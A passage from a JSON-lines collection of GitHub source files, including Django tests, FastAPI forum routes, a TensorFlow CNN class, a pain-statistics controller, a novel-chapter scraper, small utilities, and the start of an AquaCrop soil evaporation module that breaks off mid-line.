view = resolve(reverse('recipes:recipe', kwargs={'id': 1}))\n self.assertIs(view.func, views.recipe)\n\n def test_recipe_home_returns_status_code_200_ok(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertEqual(response.status_code, 200)\n\n def test_recipe_home_view_loads_correcty_template(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertTemplateUsed(response, 'recipes/pages/home.html')\n\n def test_recipes_home_template_shows_no_recipes_found_if_no_recipes(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertIn('No recipes found here', response.content.decode(\n 'utf-8'))\n\n def test_recipe_detail_view_returns_404_if_no_recipes_found(self):\n response = self.client.get(reverse('recipes:recipe', kwargs={'id': 1}))\n self.assertEqual(response.status_code, 404)\n\n def test_recipe_home_template_loads_recipes(self):\n category = Category.objects.create(name='Category Test')\n author = User.objects.create_user(\n first_name=\"User\", last_name=\"Test\", username='user', password='123456', email='username@user.com') # noqa\n\n recipe = Recipe.objects.create(\n title='Recipe Title',\n description='Description',\n slug='recipe-slug',\n preparation_time=10,\n preparation_time_unit='Minutos',\n servings=5,\n servings_unit='Porções',\n preparation_steps='Recipe Preparation Steps',\n preparation_steps_is_html=False,\n is_published=False,\n category=category,\n author=author,\n ) # noqa\n\n response = self.client.get(reverse('recipes:home'))\n content = response.content.decode('utf-8')\n response_context_recipes = response.context['recipes']\n self.assertEqual(recipe.title, content)\n self.assertEqual(len(response), 1)\n","repo_name":"metratonpr/curso-django-projeto1","sub_path":"recipes/tests/test_recipe_views.py","file_name":"test_recipe_views.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11233628915","text":"import boto3\nimport json\n\ndef lambda_handler(event=None, context=None):\n\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('UsersLeaderboard')\n\n ## insert put\n table.put_item(\n Item={\n 'id': 8,\n 'Week': '2019-11-27',\n 'TopScore': 65335,\n 'Name': 'sangwonHyun'\n }\n )\n\n return {\n 'statusCode': 200\n }","repo_name":"hyunsangwon/AWS_note","sub_path":"DynamoDB/sample-code-python/Insert.py","file_name":"Insert.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"20205378790","text":"from ..models.body_part import BodyPart\nfrom mongoengine.queryset.visitor import Q\nfrom .entry import EntryController, day_times\nfrom ..models.entry import Entry\nfrom statistics import mean, stdev, median\nimport queue\n\ninitial_histogram = {\n 'none': 0,\n 'low': 0,\n 'medium': 0,\n 'high': 0,\n 'xHigh': 0,\n}\n\nhistogram_map = {\n 'none': (0, 2),\n 'low': (2, 4),\n 'medium': (4, 6),\n 'high': (6, 8),\n 'xHigh': (8, 10)\n}\n\nclass BodyPartController():\n\n # Given a user, a body part id and optional parameters, returns the body\n # part along with statistics for the entries that satisfy the parameters.\n @staticmethod\n def getBodyPartByID(user, bpid, start_date=None, end_date=None, time_of_day=None, detail_level='high'):\n\n body_part = BodyPart.objects(pk=bpid).first()\n\n pain_entries = EntryController.getPainEntries(user, body_part, start_date, end_date, time_of_day)\n\n pain_stats = BodyPartController.computeBodyPartStats(body_part, pain_entries, start_date, end_date, time_of_day, detail_level)\n\n return (body_part, pain_stats)\n\n # Given a body part, a list of pain entries (i.e. a list of dicts that\n # contain the date, daytime, and pain level) and optional parameters,\n # returns a dict of stats for the body part.\n @staticmethod\n def computeBodyPartStats(body_part, pain_entries, start_date=None, end_date=None, time_of_day=None, detail_level='high', movingWindowSize=3):\n\n if len(pain_entries) > 0:\n pain_stats = {\n 'total': BodyPartController.computeTotalStats(pain_entries),\n 'daytime': BodyPartController.computeDaytimeStats(pain_entries),\n }\n\n if detail_level == 'high':\n calendar_stats = BodyPartController.computeCalendarStats(pain_entries)\n\n pain_stats.update({\n 'calendar': calendar_stats,\n 'moving': BodyPartController.computeMovingStats(calendar_stats, int(movingWindowSize)),\n 'histogram': BodyPartController.computeHistogram(calendar_stats)\n })\n else:\n pain_stats = {\n 'total': [],\n 'daytime': []\n }\n\n if detail_level == 'high':\n pain_stats.update({\n 'calendar': [],\n 'moving': [],\n 'histogram': []\n })\n\n return pain_stats\n\n # Given a list of pain entries (see computeBodyPartStats()), returns the\n # stats for all of the entries.\n @staticmethod\n def computeTotalStats(pain_entries):\n pain_levels = [pain_entry['pain_level'] for pain_entry in pain_entries]\n\n total_stats = BodyPartController.computeStats(pain_levels)\n\n return total_stats\n\n # Given a list of pain entries (see computeBodyPartStats()), returns the\n # stats for each time of day.\n @staticmethod\n def computeDaytimeStats(pain_entries):\n daytime_stats = {key:{} for key in day_times.keys()}\n for time_of_day in day_times:\n daytime_levels = [pain_entry['pain_level'] for pain_entry in pain_entries if (pain_entry['daytime'] == time_of_day)]\n daytime_stats[time_of_day] = BodyPartController.computeStats(daytime_levels)\n\n return daytime_stats\n\n # Given a list of pain entries (see computeBodyPartStats()) that are\n # sorted by date, returns the stats for each day.\n @staticmethod\n def computeCalendarStats(pain_entries):\n current_day_levels = []\n current_day = pain_entries[0]['date'].date()\n calendar_stats = []\n\n for entry in pain_entries:\n entry_day = entry['date'].date()\n if entry_day != current_day:\n daily_stats = {\n 'date': current_day,\n 'stats': BodyPartController.computeStats(current_day_levels)\n }\n calendar_stats.append(daily_stats)\n current_day = entry_day\n current_day_levels = []\n current_day_levels.append(entry['pain_level'])\n daily_stats = {\n 'date': current_day,\n 'stats': BodyPartController.computeStats(current_day_levels)\n }\n calendar_stats.append(daily_stats)\n\n return calendar_stats\n\n # Given a list of stats for each day (in order of date), returns the\n # moving stats (e.g. moving average) using a 3 day window by default.\n @staticmethod\n def computeMovingStats(calendar_stats, movingWindowSize=3):\n high_queue = queue.Queue()\n low_queue = queue.Queue()\n mean_queue = queue.Queue()\n std_dev_queue = queue.Queue()\n moving_stats = []\n\n for (i, daily_stat) in enumerate(calendar_stats):\n high_queue.put(daily_stat['stats']['high'])\n low_queue.put(daily_stat['stats']['low'])\n mean_queue.put(daily_stat['stats']['mean'])\n std_dev_queue.put(daily_stat['stats']['stdev'])\n\n if high_queue.qsize() > movingWindowSize:\n high_queue.get()\n low_queue.get()\n mean_queue.get()\n std_dev_queue.get()\n\n if high_queue.qsize() == movingWindowSize:\n stats = {\n 'high': mean(list(high_queue.queue)),\n 'low': mean(list(low_queue.queue)),\n 'mean': mean(list(mean_queue.queue)),\n 'stdev': mean(list(std_dev_queue.queue)),\n }\n daily_moving_stats = {\n 'date': calendar_stats[i - movingWindowSize // 2]['date'],\n 'stats': stats\n }\n moving_stats.append(daily_moving_stats)\n\n return moving_stats\n\n # Given a list of stats for each day (in order of date), returns the\n # histogram for max, min, median, and mean.\n @staticmethod\n def computeHistogram(calendar_stats):\n histogram = {\n 'high': initial_histogram.copy(),\n 'low': initial_histogram.copy(),\n 'median': initial_histogram.copy(),\n 'mean': initial_histogram.copy(),\n 'num_days': len(calendar_stats)\n }\n for daily_stat in calendar_stats:\n stats = daily_stat['stats']\n BodyPartController.addPainLevelToHist(stats['high'], histogram['high'])\n BodyPartController.addPainLevelToHist(stats['low'], histogram['low'])\n BodyPartController.addPainLevelToHist(stats['median'], histogram['median'])\n BodyPartController.addPainLevelToHist(stats['mean'], histogram['mean'])\n\n return histogram\n\n # Given a list of pain levels, returns a dict containing the max, min, mean,\n # median, stddev, and number of entries.\n @staticmethod\n def computeStats(pain_levels):\n dev = 0\n if len(pain_levels) == 0:\n return None\n elif len(pain_levels) > 1:\n dev = stdev(pain_levels)\n return {\n 'high': max(pain_levels),\n 'low': min(pain_levels),\n 'mean': mean(pain_levels),\n 'median': median(pain_levels),\n 'stdev': dev,\n 'num_entries': len(pain_levels)\n }\n\n # Given a pain level and a histogram, adds 1 to the corresponding bucket of\n # the histogram.\n @staticmethod\n def addPainLevelToHist(pain_level, histogram):\n if histogram_map['none'][0] <= pain_level < histogram_map['none'][1]:\n histogram['none'] += 1\n elif histogram_map['low'][0] <= pain_level < histogram_map['low'][1]:\n histogram['low'] += 1\n elif histogram_map['medium'][0] <= pain_level < histogram_map['medium'][1]:\n histogram['medium'] += 1\n elif histogram_map['high'][0] <= pain_level < histogram_map['high'][1]:\n histogram['high'] += 1\n elif histogram_map['xHigh'][0] <= pain_level <= histogram_map['xHigh'][1]:\n histogram['xHigh'] += 1\n","repo_name":"mmanhard/pain_control_backend","sub_path":"src/controllers/body_parts.py","file_name":"body_parts.py","file_ext":"py","file_size_in_byte":8008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"86719069064","text":"from __future__ import print_function ### if using python 2.7\nimport tensorflow as tf\n\n\n# TODO: Allow explicit definition of activation function for each layer (including output layer)\n# TODO: Add dropout functionality\n# TODO: Regularization\n# TODO: Add more evaluation metrics\n# TODO: Implement tf.Saver functionality\nclass CNN:\n \"\"\"\n Implements a Convolutional Neural Network in TensorFlow\n\n Constructor Arguments\n ---------------------\n\n configuration (dict):\n structure (list) - Defines the structure of the CNN\n \"INPUT:h,w,d\" - Input layer of size [h x w x d] (not flattened)\n\n \"CONV:fh,fw,fd,k:s\"\n - Convolutional layer with k filters (or features),\n filter size of [fh x fw x fd], stride of [1, s, s, 1],\n and SAME zero-padding\n\n \"MAXPOOL:h,w:s\"\n - Max pooling layer with subsample size of [h x w],\n stride of [1, s, s, 1], and SAME zero-padding\n\n \"FC:n\" - Fully-connected layer with n hidden neurons\n \"OUTPUT:n\" - Output layer of size n\n\n activation - Activation function of neurons (except output layer)\n in network\n cost_function - Cost function of CNN\n optimizer - Initalized TF optimizer\n num_epochs - Number of epochs to run\n batch_size - Size of training batches\n display_step - When to display logs per epoch step\n\n train_dataset (DataSet): Training data in the form of a DataSet object\n\n\n Usage:\n\n from __future__ import print_function ### if using python 2.7\n import tensorflow as tf\n from tensorflow.examples.tutorials.mnist import input_data\n\n from cnn import CNN\n from dataset import DataSet\n\n mnist_config = {\n \"structure\": [\"INPUT:28,28,1\",\n \"CONV:5,5,1,32:1\",\n \"MAXPOOL:2,2:2\",\n \"CONV:5,5,32,64:1\",\n \"MAXPOOL:2,2:2\",\n \"FC:1024\",\n \"OUTPUT:10\"],\n \"activation\": tf.nn.relu,\n \"optimizer\": tf.train.AdamOptimizer(learning_rate=1e-4),\n \"cost_function\": tf.nn.softmax_cross_entropy_with_logits,\n \"learning_rate\": 1e-4,\n \"num_epochs\": 1,\n \"batch_size\": 100,\n \"display_step\": 1\n }\n\n mnist = input_data.read_data_sets('MNIST_data', one_hot=True) ### Also saves MNIST data to disk\n mnist_train_dataset = DataSet(mnist.train.images.reshape((-1, 28, 28, 1)), mnist.train.labels)\n mnist_test_dataset = DataSet(mnist.test.images.reshape((-1, 28, 28, 1)), mnist.test.labels)\n mnist_cnn = CNN(mnist_config, mnist_train_dataset)\n mnist_cnn.train()\n print('Final Test Accuracy: ', mnist_cnn.test(mnist_test_dataset))\n\n \"\"\"\n def __init__(self, configuration, train_dataset):\n self.load_configuration(configuration)\n self.train_dataset = train_dataset\n\n def build_model(self):\n input_layer = self.structure[0]\n (input_height, input_width, input_depth) = tuple(map(int, input_layer.split(\":\")[1].split(\",\")))\n\n # Setup input\n self.x = tf.placeholder(tf.float32, shape=[None, input_height, input_width, input_depth])\n\n output_layer = self.structure[-1]\n output_layer_size = int(output_layer.split(\":\")[1])\n self.y = tf.placeholder(tf.float32, shape=[None, output_layer_size])\n\n self.weights = []\n self.biases = []\n\n hidden_layer_structure = self.structure[1:-1]\n self.hidden_layers = []\n\n for index, layer in enumerate(hidden_layer_structure):\n # Debugging\n print(layer)\n\n if \"CONV\" in layer:\n (_, filter_dim, stride) = layer.split(\":\")\n stride = int(stride)\n (filter_height, filter_width, filter_depth, num_filters) = tuple(map(int, filter_dim.split(\",\")))\n\n weights = self.create_weight_variable([filter_height, filter_width, filter_depth, num_filters])\n biases = self.create_bias_variable([num_filters])\n\n self.weights.append(weights)\n self.biases.append(biases)\n\n # Check if the conv layer is the first hidden layer\n if index == 0:\n self.hidden_layers.append(self.activation(\n self.conv2d(self.x, weights, [1, stride, stride, 1]) + biases))\n else:\n self.hidden_layers.append(self.activation(\n self.conv2d(self.hidden_layers[index-1], weights, [1, stride, stride, 1]) + biases))\n\n elif \"MAXPOOL\" in layer:\n (_, window_dim, stride) = layer.split(\":\")\n stride = int(stride)\n (height, width) = tuple(map(int, window_dim.split(\",\")))\n self.hidden_layers.append(\n self.max_pool(\n self.hidden_layers[index-1],\n [1, height, width, 1],\n [1, stride, stride, 1]\n )\n )\n\n elif \"FC\" in layer:\n num_units = int(layer.split(\":\")[1])\n\n # Check if FC layer is the first layer after the input layer\n prev_layer = self.x if index == 0 else self.hidden_layers[index - 1]\n\n (_, height, width, depth) = prev_layer.get_shape().dims\n prev_layer_size = int(height) * int(width) * int(depth)\n\n # Flatten previous layer\n prev_layer = tf.reshape(self.hidden_layers[index - 1],\n [-1, prev_layer_size])\n\n weights = self.create_weight_variable(\n [prev_layer_size, num_units])\n biases = self.create_bias_variable([num_units])\n\n self.weights.append(weights)\n self.biases.append(biases)\n\n self.hidden_layers.append(\n self.activation(tf.matmul(prev_layer, weights) + biases)\n )\n\n # Get last hidden layer of network\n last_hidden_layer = self.hidden_layers[-1]\n\n # Get dimensions of last hidden layer\n last_hidden_layer_dims = last_hidden_layer.get_shape().dims\n\n # Check if last hidden layer is not flat\n if len(last_hidden_layer_dims) == 4:\n (_, height, width, depth) = last_hidden_layer_dims\n last_hidden_layer_size = int(height) * int(width) * int(depth)\n\n # Flatten last hidden layer\n last_hidden_layer = tf.reshape(last_hidden_layer,\n [-1, last_hidden_layer_size])\n elif len(last_hidden_layer_dims) == 2:\n (_, last_hidden_layer_size) = last_hidden_layer_dims\n last_hidden_layer_size = int(last_hidden_layer_size)\n\n # Create output layer weights and biases\n output_layer_weights = self.create_weight_variable([last_hidden_layer_size, output_layer_size])\n output_layer_biases = self.create_bias_variable([output_layer_size])\n\n # Linear transformation of last hidden layer\n self.output = tf.matmul(last_hidden_layer, output_layer_weights) + output_layer_biases\n\n # Output prediction of model\n # See todo about activation function customization\n self.y_pred = tf.nn.softmax(self.output)\n\n # Determine cost of model\n self.cost = tf.reduce_mean(self.cost_function(self.output, self.y))\n\n # Define training step\n self.train_step = self.optimizer.minimize(self.cost)\n\n # Determine correct predictions\n correct_prediction = tf.equal(\n tf.cast(tf.argmax(self.y_pred, 1), tf.float32),\n tf.cast(tf.argmax(self.y, 1), tf.float32)\n )\n\n # Define accuracy measure\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n def train(self):\n \"\"\" Handles CNN training \"\"\"\n\n # Build CNN model\n self.build_model()\n print(\"Finished building CNN model\")\n\n # Save TF Session to instance\n self.sess = tf.Session()\n self.sess.run(tf.initialize_all_variables())\n\n for epoch in range(self.num_epochs):\n avg_cost = 0.0\n total_batch = int(self.train_dataset.num_examples / self.batch_size)\n # Loop over all batches\n for i in range(total_batch):\n batch_x, batch_y = self.train_dataset.next_batch(self.batch_size)\n # Run optimization op (backprop) and cost op (to get loss value)\n _, cost = self.sess.run([self.train_step, self.cost],\n feed_dict={\n self.x: batch_x,\n self.y: batch_y\n })\n # Compute average loss\n avg_cost += cost / total_batch\n # Debugging purposes\n print(\"Mini-batch %d\"%i, \"cost=\", \"{:.9f}\".format(cost))\n\n # Display logs per epoch step\n if epoch % self.display_step == 0:\n print(\"Epoch:\", '%04d' % (epoch+1), \"cost=\", \"{:.9f}\".format(avg_cost))\n\n def test(self, test_dataset):\n return self.accuracy.eval(\n {self.x: test_dataset.features, self.y: test_dataset.labels},\n session=self.sess # Use trained model\n )\n\n def create_weight_variable(self, shape):\n \"\"\" Initalize weights using truncated normal distribution \"\"\"\n return tf.Variable(tf.truncated_normal(shape, stddev=0.1))\n\n def create_bias_variable(self, shape):\n \"\"\" Intialize neurons with slightly positive bias \"\"\"\n return tf.constant(0.1, shape=shape)\n\n def conv2d(self, x, weights, strides):\n \"\"\" Compute 2D convolution of given x and weights (filter) \"\"\"\n return tf.nn.conv2d(x, weights, strides=strides, padding=\"SAME\")\n\n def max_pool(self, x, ksize, strides):\n \"\"\" Compute max-pooling \"activations\" \"\"\"\n return tf.nn.max_pool(x, ksize=ksize, strides=strides, padding=\"SAME\")\n\n def avg_pool(self, x, ksize, strides):\n # TODO: Implement average pooling\n pass\n\n def load_configuration(self, config):\n \"\"\" Sets configuration variables \"\"\"\n self.structure = config[\"structure\"]\n self.cost_function = config[\"cost_function\"]\n self.activation = config[\"activation\"]\n self.optimizer = config[\"optimizer\"]\n\n self.num_epochs = config[\"num_epochs\"]\n self.display_step = config[\"display_step\"]\n self.batch_size = config[\"batch_size\"]\n","repo_name":"young-jon/biotensorflow","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":10650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"7852288156","text":"\nfrom fastapi import APIRouter, Query\nfrom datetime import datetime\nfrom sqlalchemy import or_, and_\nfrom database import SessionLocal\nfrom typing import Optional\nimport models\n\ndb = SessionLocal()\n\n\nrouter = APIRouter(\n prefix=\"/forum\",\n responses={404: {\"description\": \"Not found\"}},\n tags=[\"Forum\"]\n)\n\n\n@router.post(\"/get_create_user\", status_code=200)\ndef getOrCreateUser(email:str):\n user = db.query(models.User).filter(models.User.email == email).first()\n if user:\n return user\n else:\n new_user = models.User(\n email=email,\n last_active=datetime.now()\n )\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n return new_user\n\n\n@router.get(\"/\", status_code=200)\nasync def getForums(string_filter: Optional[str] = Query(None)):\n print(\"String filter\", string_filter)\n if string_filter == \"\" or string_filter == None:\n forums = db.query(models.Thread).all()\n return forums\n forums = db.query(models.Thread).filter(\n and_(\n or_(models.Thread.title.ilike(f\"%{string_filter}%\"), models.Thread.body.ilike(f\"%{string_filter}%\")),\n models.Thread.is_forum == True\n )\n ).all()\n return forums\n\n@router.post('/', status_code=201)\ndef createForum(forum: models.CreateCommentWithEmail):\n\n user = getOrCreateUser(forum.email)\n\n new_forum = models.Thread(\n is_forum=True,\n title=forum.title,\n body=forum.body,\n user_id=user.id,\n created_time=datetime.now(),\n tags=[]\n )\n db.add(new_forum)\n db.commit()\n db.refresh(new_forum)\n return new_forum\n\n@router.get(\"/{forum_id}\", status_code=200)\ndef getForum(forum_id: int):\n \"\"\"Returns the forum details and an array of comments recurively\n\n Args:\n forum_id (int): The id of the forum\n\n \"\"\"\n def getCommentsOfParentId(parent_id, depth=0, max_depth=10):\n if depth >= max_depth:\n return []\n\n forum_data = {}\n comments_list = []\n\n forum = db.query(models.Thread).filter(models.Thread.thread_id == forum_id).first()\n if not forum:\n return forum_data # Return empty data if the forum does not exist\n\n comments = db.query(models.Thread).filter(models.Thread.parent_id == parent_id).all()\n\n for comment in comments:\n # print(comment, comment.thread_id, comment.parent_id)\n # comment_data = getCommentsOfParentId(comment.thread_id, depth + 1, max_depth)\n # comments_list.append(comment_data)\n # forum = db.query(models.Thread).filter(models.Thread.thread_id == forum_id).first()\n # if not forum:\n # return forum_data # Return empty data if the forum does not exist\n\n comments = db.query(models.Thread).filter(models.Thread.parent_id == comment.thread_id).all()\n comments_list.append({\"forum\": comment, \"comments\": comments})\n\n forum_data[\"forum\"] = forum\n forum_data[\"comments\"] = comments_list\n\n return forum_data\n\n forum_data = getCommentsOfParentId(forum_id)\n return forum_data\n\n\n@router.post(\"/comments\", status_code=201)\ndef createComment(comment: models.CreateCommentWithEmail):\n \"\"\"Creates a comment on a forum or thread\n\n Args:\n forum_id (int): The id of the forum or thread\n\n \"\"\"\n\n user = getOrCreateUser(comment.email)\n\n new_comment = models.Thread(\n is_forum=False,\n body=comment.body,\n user_id=user.id,\n title=comment.title,\n parent_id=comment.parent_id,\n tags=[],\n created_time=datetime.now()\n )\n db.add(new_comment)\n db.commit()\n db.refresh(new_comment)\n return new_comment\n\n\n\n\n\n","repo_name":"NeneWang/sase_backend_2023","sub_path":"routes/forumRoutes.py","file_name":"forumRoutes.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20254250809","text":"import aiohttp\n\nfrom sprapi.classes import Information\n\n\nclass SPRadioApi:\n __api_url = 'https://radio.spworlds.city/api'\n\n async def __request_get(self, path: str = None):\n session = aiohttp.ClientSession()\n\n async with session.get(self.__api_url + path) as response:\n result = await response.json()\n await session.close()\n return result\n\n async def get_information(self) -> Information:\n res = await self.__request_get(\"/nowplaying/1\")\n return Information(res)\n\n async def get_now_playing(self):\n info = await self.get_information()\n return info.now_playing\n","repo_name":"teleportx/sp-radio-bot","sub_path":"sprapi/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"74733469830","text":"import requests\r\nimport re\r\nimport time\r\n\r\nheaders = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'\r\n}\r\n\r\nf = open('./doupo.txt','a+')\r\n\r\ndef get_info(url):\r\n res = requests.get(url,headers=headers)\r\n if res.status_code == 200:\r\n contents = re.findall('

(.*?)

',res.content.decode('utf-8'),re.S)\r\n for content in contents:\r\n f.write(content+'\\n')\r\n else:\r\n pass\r\n\r\nif __name__ == '__main__':\r\n urls = ['http://www.doupoxs.com/doupocangqiong/{}.html'.format(str(i)) for i in range(2,1665)]\r\n for url in urls:\r\n get_info(url)\r\n time.sleep(1)\r\n f.close()\r\n","repo_name":"huankiki/DataProcBeginner","sub_path":"crawler_python_from_scratch/book_src/doupo_xiaoshuo.py","file_name":"doupo_xiaoshuo.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"16620068693","text":"def spacer(words=None, notif=True, copy=True) -> str:\n from .basicfunctions import argv, indextest, copycheck, notifcheck\n\n words = words or \" \".join(argv[2:])\n converted = []\n indextest(\n [\n \"Huh.\",\n \"\"\"It seems that you did not input anything to space out.\nTry running 'help spacer' if you do not know what you are doing.\"\"\",\n 5,\n ]\n )\n for i in words:\n converted.append(i)\n converted.append(\" \")\n copycheck(copy, \"\".join(converted))\n notifcheck(notif, [\"Success!\", \"Message copied to clipboard.\", 2])\n return \"\".join(converted)\n","repo_name":"prokenz101/utilities-py","sub_path":"functions/spacer.py","file_name":"spacer.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"71975137351","text":"class Solutions:\n \n def findMaxConsecutiveOnes(self, nums: list[int]) -> int:\n _max = count = 0\n for i in nums:\n count = (count + i) * i # 遇0得0,遇1加1\n if count > _max:\n _max = count\n return _max\n\n def findPoisonedDuration(self, timeSeries: list[int], duration: int) -> int:\n t = 0\n if len(timeSeries) == 1:\n return duration\n last = timeSeries[0]\n for fast in timeSeries[1:]:\n if fast - last > duration:\n t += duration\n else:\n t += fast - last\n last = fast\n return t + duration\n\n def thirdMax(self, nums: list[int]) -> int:\n nums = list(set(nums))\n nums.sort(reverse=True)\n return nums[0] if len(nums) < 3 else nums[2]\n\n def maximumProduct(self , nums :list[int])->int:\n nums.sort(reverse=True)\n k = nums[0]*nums[1]*nums[2]\n i = nums[0]*nums[-1]*nums[-2]\n return i if i>k else k\n ","repo_name":"Chenpeel/Codes","sub_path":"Python/algo_codes/solu_py/array/traverse_array.py","file_name":"traverse_array.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73750411273","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# AquaCrop crop growth model\n\nimport numpy as np\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass SoilEvaporation(object):\n \"\"\"Class to represent daily soil evaporation\"\"\"\n\n def __init__(self, SoilEvaporation_variable):\n self.var = SoilEvaporation_variable\n\n def initial(self):\n arr_zeros = np.zeros((self.var.nCrop, self.var.nLat, self.var.nLon))\n self.var.Epot = np.copy(arr_zeros)\n self.var.Stage2 = np.copy(arr_zeros.astype(bool))\n self.var.EvapZ = np.copy(arr_zeros)\n self.var.Wstage2 = np.copy(arr_zeros)\n self.var.Wsurf = np.copy(arr_zeros)\n self.var.Wevap_Act = np.copy(arr_zeros)\n self.var.Wevap_Sat = np.copy(arr_zeros)\n self.var.Wevap_Fc = np.copy(arr_zeros)\n self.var.Wevap_Wp = np.copy(arr_zeros)\n self.var.Wevap_Dry = np.copy(arr_zeros)\n\n def reset_initial_conditions(self):\n pass\n\n def evap_layer_water_content(self):\n \"\"\"Function to get water contents in the evaporation layer\"\"\"\n if np.any(self.var.GrowingSeasonDayOne):\n self.reset_initial_conditions()\n \n arr_ones = np.ones((self.var.nCrop, self.var.nLat, self.var.nLon))\n dz = self.var.dz[None,:,None,None] * arr_ones[:,None,:,:]\n dzsum = self.var.dzsum[None,:,None,None] * arr_ones[:,None,:,:]\n\n # Find compartments covered by evaporation layer\n evapz_comp = self.var.EvapZ[:,None,:,:] * np.ones((self.var.nComp))[None,:,None,None]\n comp_sto = (np.round((dzsum - dz) * 1000) < np.round(evapz_comp * 1000))\n factor = 1 - ((dzsum - evapz_comp) / dz)\n factor = np.clip(factor, 0, 1) * comp_sto\n\n # Water storages in evaporation layer (mm)\n Wevap_Act = np.sum((factor * 1000 * self.var.th * dz), axis=1)\n self.var.Wevap_Act = np.clip(Wevap_Act, 0, None)\n self.var.Wevap_Sat = np.sum((factor * 1000 * self.var.th_s_comp * dz), axis=1)\n self.var.Wevap_Fc = np.sum((factor * 1000 * self.var.th_fc_comp * dz), axis=1)\n self.var.Wevap_Wp = np.sum((factor * 1000 * self.var.th_wp_comp * dz), axis=1)\n self.var.Wevap_Dry = np.sum((factor * 1000 * self.var.th_dry_comp * dz), axis=1)\n\n def prepare_stage_two_evaporation(self):\n self.evap_layer_water_content()\n Wstage2 = ((self.var.Wevap_Act - (self.var.Wevap_Fc - self.var.REW)) / (self.var.Wevap_Sat - (self.var.Wevap_Fc - self.var.REW)))\n Wstage2 = (np.round((Wstage2 * 100)) / 100)\n Wstage2 = np.clip(Wstage2, 0, None)\n # self.var.Wstage2 = Wstage2\n return Wstage2\n\n def potential_soil_evaporation_rate(self, tAdj):\n\n # No canopy cover outside of growing season so potential soil\n # evaporation only depends on reference evapotranspiration\n et0 = self.var.referencePotET[None,:,:] * np.ones((self.var.nCrop))[:,None,None] \n EsPot = (self.var.Kex * et0)\n\n # Calculate maximum potential soil evaporation and potential soil\n # evaporation given current canopy size\n EsPotMax = (self.var.Kex * et0 * (1 - self.var.CCxW * (self.var.fwcc / 100)))\n EsPot[self.var.GrowingSeasonIndex] = (self.var.Kex * (1 - self.var.CCadj) * et0)[self.var.GrowingSeasonIndex]\n\n # Adjust potential soil evaporation for effects of withered canopy\n cond3 = (self.var.GrowingSeasonIndex & (tAdj > self.var.Senescence) & (self.var.CCxAct > 0))\n mult = np.ones((self.var.nCrop, self.var.nLat, self.var.nLon))\n cond31 = (cond3 & (self.var.CC > (self.var.CCxAct / 2)))\n cond311 = (cond31 & (self.var.CC > self.var.CCxAct))\n mult[cond311] = 0\n cond312 = (cond31 & np.logical_not(cond311))\n mult_divd = (self.var.CCxAct - self.var.CC)\n mult_divs = (self.var.CCxAct / 2)\n mult[cond312] = np.divide(mult_divd, mult_divs, out=np.zeros_like(mult_divs), where=mult_divs!=0)[cond312]\n\n EsPot[cond3] = (EsPot * (1 - self.var.CCxAct * (self.var.fwcc / 100) * mult))[cond3]\n CCxActAdj = ((1.72 * self.var.CCxAct) + (self.var.CCxAct ** 2) - 0.3 * (self.var.CCxAct ** 3))\n EsPotMin = np.zeros((self.var.nCrop, self.var.nLat, self.var.nLon))\n EsPotMin[cond3] = (self.var.Kex * (1 - CCxActAdj) * et0)[cond3]\n EsPotMin = np.clip(EsPotMin, 0, None)\n\n # Line 85-89 of AOS_SoilEvaporation.m\n EsPot[cond3] = np.clip(EsPot, EsPotMin, EsPotMax)[cond3]\n\n cond4 = (self.var.GrowingSeasonIndex & self.var.PrematSenes)\n EsPot[cond4] = np.clip(EsPot, None, EsPotMax)[cond4]\n # self.EsPot = EsPot\n return EsPot\n\n def adjust_potential_soil_evaporation_for_irrigation(self, EsPot):\n EsPotIrr = np.copy(EsPot)\n cond1 = ((irr_depth > 0) & (irr_method != 4))\n cond11 = (cond1 & ((prec > 0) | (surface_storage > 0)))\n EsPotIrr[cond11] = EsPot[cond11]\n cond12 = (cond1 & np.logical_not(cond11))\n EsPotIrr[cond12] = (EsPot * (wet_surf / 100))[cond12] # TODO: more informative name for wet_surf\n return EsPotIrr\n\n def adjust_potential_soil_evaporation_for_mulches(self, EsPot):\n\n # NB if surface is flooded then there is no adjustment of potential soil\n # evaporation, regardless of mulches \n EsPotMul = np.copy(EsPot)\n cond1 = (self.var.SurfaceStorage < 0.000001)\n cond11 = (cond1 & (self.var.Mulches == 1))\n cond111 = (cond11 & self.var.GrowingSeasonIndex)\n EsPotMul[cond111] = (EsPot * (1 - self.var.fMulch * (self.var.MulchPctGS / 100)))[cond111]\n cond112 = (cond11 & np.logical_not(self.var.GrowingSeasonIndex))\n EsPotMul[cond112] = (EsPot * (1 - self.var.fMulch * (self.var.MulchPctOS / 100)))[cond112]\n return EsPotMul\n\n def extract_water(self, ToExtract, ToExtractStg):\n arr_ones = np.ones((self.var.nCrop, 